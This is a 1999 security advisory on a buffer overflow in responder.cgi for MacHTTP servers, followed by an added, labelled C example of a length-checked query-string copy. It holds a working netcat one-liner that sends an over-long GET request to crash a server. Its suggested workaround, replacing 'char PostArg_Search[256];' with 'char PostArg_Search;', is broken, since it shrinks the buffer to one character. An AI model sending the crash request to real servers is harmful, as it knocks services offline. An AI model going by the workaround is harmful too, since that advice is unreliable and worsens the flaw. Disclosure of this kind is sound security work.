___________________________
            /        /        /        /\
     ______/    ____/    ____/        / /
    /     /        /        /    ____/ /
   /     /____    /    ____/        / / 
  / / / /        /        /        / /
 /_/_/_/________/________/________/ /
 \_____\________\________\________\/
 / . ../Macintosh  Security/.. .  /
/________________________________/
Presents:

Responder.cgi Vulnerability
Written by Epic, A Member of mSec <epic@msec.net>
Released 4/9/99

Responder.cgi, a public domain 'C' shell for MacHTTP CGI servers, contains a buffer overflow that, when exploited, will cause the server it is run on to freeze. You are at risk if your responder.cgi file contains the line of code:

char PostArg_Search[256];

which holds the QUERY_STRING. Since it only allows up to 256 characters after the ?, the server will crash if 257+ characters are requested.

Exploit Example: (nc is netcat from avian.org)
$ echo "GET /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc machttp-server.com 80

Possible Workaround:
Remove responder.cgi from your /cgi-bin/ or change
char PostArg_Search[256]; to
char PostArg_Search;
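
Added example, not part of the original advisory or the responder.cgi source: a length-checked copy into the fixed-size buffer that rejects an oversized query string instead of writing past the end. Only the PostArg_Search[256] declaration comes from the advisory; the helper name copy_query_string, the reject-on-overflow policy and the sample inputs are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Buffer declaration quoted in the advisory. A 256-byte array holds at
 * most 255 characters plus the terminating NUL. */
char PostArg_Search[256];

/* Hypothetical helper (not from the responder.cgi source): copy the
 * query string into a fixed buffer only if it fits, terminator included.
 * Returns 0 on success, -1 if the input is missing or too long. On
 * failure dst is left as an empty string, never truncated or
 * unterminated. */
int copy_query_string(char *dst, size_t dst_size, const char *query)
{
    size_t len = 0;

    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (query == NULL)
        return -1;

    /* Measure the input without reading more than dst_size bytes. */
    while (len < dst_size && query[len] != '\0')
        len++;
    if (len >= dst_size)        /* no room left for the NUL */
        return -1;

    memcpy(dst, query, len);
    dst[len] = '\0';
    return 0;
}

int main(void)
{
    char query[301];            /* constructed sample input */
    size_t sizes[] = { 10, 255, 256, 300 };
    size_t i;

    for (i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        memset(query, 'x', sizes[i]);
        query[sizes[i]] = '\0';
        printf("%lu chars -> %s\n", (unsigned long)sizes[i],
               copy_query_string(PostArg_Search, sizeof PostArg_Search,
                                 query) == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```

A CGI that gets -1 back should answer with an error response rather than continue processing the request.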

Epic <epic@msec.net>
http://www.msec.net
hotline://msec.net